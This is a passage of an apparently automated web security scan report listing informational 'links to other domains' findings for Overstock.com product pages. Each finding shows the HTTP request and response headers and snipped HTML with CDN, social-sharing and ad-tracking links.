...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=13042090;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.4. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?IID=prod5213639&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:07 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:07 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="zoomify_div">

<img style="display: block;" onclick="return viewLarger();" id="activeImage" src="http://ak1.ostkcdn.com/images/products/P13042090.jpg" alt="Sean John Men's 3-Button Suit"


width='250'

border="0"
onLoad="CheckSize(this)"
/>



<div id="adobeIcon">
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak2.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak1.ostkcdn.com/images/products/MLA13042090.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA13042090.jpg" alt="Sean John Men's 3-Button Suit" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, true)" href="http://ak1.ostkcdn.com/images/products/MLB13042090.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB13042090.jpg" alt="Sean John Men's 3-Button Suit">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com//img/mxc/apo_fpo_logo.gif' border='0' alt="ApoFpo able">
</dl>
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=13042090;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.5. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:47 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak2.ostkcdn.com/images/products/P12084670.jpg"
alt="Bella Chaise Dark Brown"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Bella Chaise Dark Brown" href="http://ak2.ostkcdn.com/images/products/P12084670.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak1.ostkcdn.com/images/products/P12084670.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak2.ostkcdn.com/images/products/MLA12084670.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA12084670.jpg" alt="Bella Chaise Dark Brown" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB12084670.jpg">
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLB12084670.jpg" alt="Bella Chaise Dark Brown">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars4_5.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars4_5.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak1.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak1.ostkcdn.com/img/mxc/stars3_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=12084670;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?TID=R:A2_1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:47 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak2.ostkcdn.com/images/products/P12084670.jpg"
alt="Bella Chaise Dark Brown"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Bella Chaise Dark Brown" href="http://ak1.ostkcdn.com/images/products/P12084670.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak1.ostkcdn.com/images/products/P12084670.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLA12084670.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA12084670.jpg" alt="Bella Chaise Dark Brown" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB12084670.jpg">
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLB12084670.jpg" alt="Bella Chaise Dark Brown">
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars4_5.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
